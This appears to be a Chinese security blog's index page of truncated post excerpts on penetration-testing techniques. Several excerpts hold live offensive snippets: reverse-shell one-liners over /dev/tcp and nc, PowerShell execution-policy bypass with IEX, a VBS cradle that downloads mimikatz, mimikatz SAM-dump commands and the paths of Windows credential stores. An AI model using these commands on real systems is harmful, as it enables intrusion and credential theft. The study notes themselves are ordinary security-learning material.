冰蝎3.0的使用方法与默认密码更改方法
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3ANX6p5X-1597048406819)(evernotecid://90B54479-F8FA-4F06-9F90-73E6593C6866/appyinxiangcom/27458002/ENResource/p155)]
windows下socket编程的原理与分步实现
前言前几年写过socket编程,后面很久不用就忘记了这块技术。最近在研究msf payload的执行原理,又得用到socket编程的技术,于是就有了这篇文章。这篇文章跟msf中的技术没多少关系,属于一篇基础文章,看懂这篇文章后继续看msf payload原理就会有一种茅塞顿开的感觉。windows下socket编程的特点相比较于基于python的socket编程,windows下的socket编程十分复杂。需要多个步骤,还需要设置多个数据结构。python 只需要两行:而c语言需要很多很
msf reserve_tcp payload加载器的原理与实现
#undef UNICODE#define WIN32_LEAN_AND_MEAN#include <windows.h>#include <winsock2.h>#include <ws2tcpip.h>#include <stdlib.h>#include <stdio.h>// Need to link with Ws2_32.lib#pragma comment (lib, "Ws2_32.lib")// #prag
github网络安全工具合集
漏洞练习平台WebGoat漏洞练习平台:https://github.com/WebGoat/WebGoatwebgoat-legacy漏洞练习平台:https://github.com/WebGoat/WebGoat-Legacyzvuldirll漏洞练习平台:https://github.com/710leo/ZVulDrillvulapps漏洞练习平台:https://github.com/Medicean/VulAppsdvwa漏洞练习平台:https://github.com/
NTLM认证与kerberos认证与PAC相关知识
ntml认证一般用于工作组环境中,也就是个人PC机。流程:1.客户端向服务器发送用户名2.服务器向客户端发送一个challenge,并用发送过来的用户名的NTML hash对其进行加密生成 NET-NTML并存在内存中。3.客户收到challenge后用自己的 NTML hash对其进行加密生成response , 并将response发送给服务端4.服务端验证response是否与内存中的NET-NTML相等,若相等则认证成功。kerberos认证如果cat 要访问tom这个server,
各种端口扫描技术的相关原理
Xmas Tree扫描发送一个flag为PSH,FIN,URG的包。如果对方主机端口开放则无反应。如果端口关闭,则会返回一个rst包。对windows主机来说无论端口开放与否,都返回rst。Fin扫描发送flag为fin的数据包,如果对方端口开放,则无反应。如果关闭则反回一个rst包。类似于Xmas Tree。对windows主机来说无论端口开放与否,都返回rst。Null扫描发送一个没有flag的tcp/ip包,如果端口开放则返回rst包,如果关闭则无反应。对windows主机来说无论端口开放
windows命令行环境下几种文件下载的方法
Vbsecho Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbsecho Set Shell = CreateObject("Wscript.Shell") >>download.vbsecho Post.Open "GET","https://raw.githubusercontent.com/shanfenglan/mimikatz/master/mimikatz.sln",0 >>download
ssh端口转发与meterpreter shell上路由配置与proxychains代理配置与frp进行内网穿透与ew
ssh端口转发一些命令参数-C 压缩数据传输-f 后台登录用户名密码-N 不执行shell[与-g 合用] -g 允许打开的端口让远程主机访问在一台公网 VPS 上编辑 sshd 配置,开启 ssh 转发功能,重启 ssh 服务,这是所有使用 ssh 隧道转发前的必备操作:vim /etc/ssh/sshd_configAllowTcpForwarding yesGatewayPorts yesTCPKeepAlive yesPasswordAuthentication yes#sy
ntds.dit文件的获取与解密
它们在哪儿?ntds.dit文件是域环境中域控上会有的一个文件,这个文件存储着域内所有用户的凭据信息(hash)。非域环境也就是在工作组环境中,有一个sam文件存储着当前主机用户的密码信息,想要破解sam文件与ntds.dit文件都需要拥有一个system文件。ntds.dit文件位置: C:\Windows\NTDS\NTDS.ditsystem文件位置:C:\Windows\System32\config\SYSTEMsam文件位置:C:\Windows\System32\config\SAM
powershell下载文件与绕过执行策略与相关命令参数简述
模块导入Import-Module ReconImport-Module -name .\powerview.ps1查看模块对应命令Get-Command -Module name其他powershell.exe -ExecutionPolicy bypass -noprofile IEX(’’)上述命令意思为1、将执行策略设置为绕过,这样可以执行powershell脚本文件。2、不加载配置文件3、隐藏窗口4、Iex命令为invove-expression的别名:接收一个字符串作
sam文件获取与解密
前言ntds.dit文件位置: C:\Windows\NTDS\NTDS.ditsystem文件位置:C:\Windows\System32\config\SYSTEMsam文件位置:C:\Windows\System32\config\SAM#通过SAM数据库获得用户hash的方法远程读取mimikatz在线读取SAM数据库privilege::debugtoken::elevatelsadump::sampowershell利用empire里面的一个powershell
sqlmap命令行参数翻译与常见用法
声明很久以前收集的,最近有研究sql注入的想法,所以贴出以备不时之需。具体参数翻译–version 显示程序的版本号并退出-h, –help 显示此帮助消息并退出-v VERBOSE 详细级别:0-6(默认为 1)Target(目标):以下至少需要设置其中一个选项,设置目标 URL。-d DIRECT 直接连接到数据库。-u URL, –url=URL 目标 URL。-l LIST 从 Burp 或 WebScarab 代理的日志中解析目标。-r REQUESTFILE 从一个文件中
windows组策略与ACL访问控制列表
什么是组策略组策略与工作组没关系,它是许多策略的集合,组策略的组代表的是一组或者说多个,并不代表工作组的组。例如本地安全策略就是组策略的一部分。ou是组织单元,组策略可以下发给ou可以给域可以给站点等。优先级ou最高一次递减。但子ou的优先级比父ou高(默认情况)。组策略相当于一张任务计划书。可以分配给不同的部门。组策略大体分为如下几种:域内组策略在DC直接在服务器管理下面点的那个“组策略管理”即可管理域内组策略,这个组策略只对域内的主机有用。命令行的命令为gpmc.msc。 它的作用是
https通信原理与中间人攻击原理与常见http服务端响应码
中间人攻击 MITMa想给c发信息,这时候b劫持了某个路由器,然后进行中间人攻击声称自己是c,把自己的公钥发给了a,这时候a以为是c发来的公钥,就用这个公钥进行加密并传输自己本应传输给c的内容,这时候b劫持内容,用自己的私钥解密,再修改内容,再向c说自己是a希望跟他通信再得到c的公钥,用c的公钥给内容加密,将这个数据包发给c,完成中间人攻击。https通信原理https是http+ssl,利用非对称密钥加密实现数据传输安全。为了同时保证通信过程的安全性与可用性,HTTPS选择了折中的方案,即使用非对称
敏感端口上的常见攻击方式
端口协议/服务攻击技巧21/22/69ftp/tftp:文件传输协议爆破嗅探溢出;后门22ssh:远程连接爆破OpenSSH;28个退格23telnet:远程连接爆破嗅探25smtp:邮件服务邮件伪造53DNS:域名系统DNS区域传输DNS劫持DNS缓存投毒DNS欺骗深度利用:利用DNS隧道技术刺透防火墙67/68dhcp劫持欺骗110pop3爆破139samba爆破未授权访问远程代码执行143imap...
linux下suid提权笔记
findfind /bin/ -name ls -exec /bin/nc -lvp123 ;find /bin/ -name ls -exec /bin/bash -i >& /dev/tcp/127.0.0.1/1234 0>&1 ;find / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/dev/nulllessless /etc/passwd!/bin
linux反弹shell的原理
完整命令反弹shell命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1bash -i > /dev/tcp/ip/port 0>&1 2>&1利用nc反弹shell:nc -lvvp 12345 -t -e /bin/bash原理bash -i > /dev/tcp/ip/port 0>&1 2>&1bash -i 打开一个交互式的bash&是为了
windows日常使用常见快捷命令
解决反弹shell乱码chcp 65001 #修复乱码文件融合copy Trace.exe/b +beacon.exe/a 2.exe #将Trace与beacon融合成为 2.exe,由于破坏了pe结构所以无法执行。日常运维任务管理器taskmgr桌面进程 explorer组策略设置:gpedit.mscappwiz.cpl添加与删除sysdm.cpl 系统属性页面可以配置环境变量tasklist /svc #查看当前的任务列表taskkill /f /pid 123 #
windows环境下信息收集的相关命令详解与延伸与内网定位
内网ip段A类:10.0.0.0-10.255.255.255B类:172.16.0.0-172.31.255.255C类:192.168.0.0-192.168.255.255获取主机名hostname或者echo %COMPUTERNAME%systeminfosysteminfo | find /i "domain"#查看机器在哪个域systeminfo | find /i "KB"#查看系统安装的补丁wmicwmic qfe list #查看补丁详情scsc query
今日推荐
周排行